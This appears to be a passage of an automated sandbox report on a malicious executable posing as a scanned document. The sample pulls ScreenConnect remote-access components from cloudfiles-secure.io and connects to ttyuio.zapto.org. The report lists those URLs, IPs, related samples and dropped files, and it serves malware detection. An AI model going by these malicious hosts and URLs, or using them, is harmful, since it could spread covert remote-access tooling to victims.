http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cloudfiles-secure.io	178.215.236.119	true	true	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown
ttyuio.zapto.org	178.215.236.119	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dll	true	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dll	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8	dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationA	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/?	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dllJ	dfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.founder.com.cn/cn/bThe	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exeO	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers?	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlll6	dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect	dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.5.dr	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllZ	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%	dfsvc.exe, 00000001.00000002.2641007006.00000261F9A75000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965310592.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlll7	dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.goodfont.co.kr	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	dfsvc.exe, 00000001.00000002.2641485344.00000261F9B0B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Big	ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false		unknown
http://www.founder.com.cn/cn/cThe	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Cli	dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/staff/dennis.htm	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.e	dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W	dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.5.dr	false		unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationlture=neutraQ	ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cloudfiles-secure.io	dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0	dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3.o	dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o	5VTPZWXQ.log.1.dr	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationEB	dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fonts.com	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000001.00000002.2619140064.000002618001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2961877052.0000000002016000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl3.digicert.	dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	qmgr.db.5.dr, edb.log.5.dr	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe0	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.e	dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl3.digicert.c	Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configC	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationps_	ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.p	dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.microsoft.	svchost.exe, 00000005.00000002.2960166987.0000013D88EB3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.w3.or	dfsvc.exe, 00000001.00000002.2619140064.0000026180354000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000005.00000002.2961471636.0000013D8E211000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic	ScreenConnect.WindowsClient.exe, 00000009.00000002.1964767967.0000000000594000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966344206.000000001ABE0000.00000004.00000020.00020000.00000000.sdmp, 5VTPZWXQ.log.1.dr	false		unknown
http://www.carterandcone.coml	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationsa	dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/frere-user.html	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exed	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	edb.log.5.dr	false		unknown
https://cloudfiles-secure.io	dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Win	dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi	dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll0.1.dr	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2639140020.00000261F9938000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers8	dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.appli	Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exeo	dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application561934e089	ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestn32	dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie	dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.215.236.119	cloudfiles-secure.io	Germany		10753	LVLT-10753US	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523875
Start date and time:	2024-10-02 06:15:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Scan_doc_09_16_24_1203.exe
Detection:	MAL
Classification:	mal66.evad.winEXE@19/75@2/2
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 60% Number of executed functions: 113 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.90.27, 20.42.73.29
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7452 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:16:17	API Interceptor	538420x Sleep call for process: dfsvc.exe modified
00:16:17	API Interceptor	1x Sleep call for process: Scan_doc_09_16_24_1203.exe modified
00:16:18	API Interceptor	2x Sleep call for process: svchost.exe modified
00:16:40	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
178.215.236.119	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse
	tr5jscSEwo.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ttyuio.zapto.org	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	tr5jscSEwo.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
cloudfiles-secure.io	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.119.113.59
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.119.113.59
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.119.113.59
fp2e7a.wpc.phicdn.net	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://tvsurf.jp/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://racrodisaver.co.in/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.elightsailorsbank.uksfholdings.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://sanbernardinoscounty.telcom-info.com/	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	SmokeLoader	Browse	192.229.221.95
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LVLT-10753US	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	tr5jscSEwo.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119
	Ge1x3MBwf4.exe	Get hash	malicious	ScreenConnect Tool	Browse	178.215.236.119

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	178.215.236.119
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	178.215.236.119
	e6y2SzRzyr.vbs	Get hash	malicious	PureLog Stealer	Browse	178.215.236.119
	ejdc7iP3A7.vbs	Get hash	malicious	Remcos	Browse	178.215.236.119
	risTLdc664.vbs	Get hash	malicious	FormBook	Browse	178.215.236.119
	Wg3tf5MIzS.vbs	Get hash	malicious	PureLog Stealer	Browse	178.215.236.119
	9gTW6ik1Z1.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	178.215.236.119
	lcvKxaEBA3.vbs	Get hash	malicious	PureLog Stealer	Browse	178.215.236.119
	vt4hGZq9md.vbs	Get hash	malicious	PureLog Stealer	Browse	178.215.236.119
	NTiwJrX4R4.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.215.236.119

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse
	xkIXA8M8sC.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073457884817659
Encrypted:	false
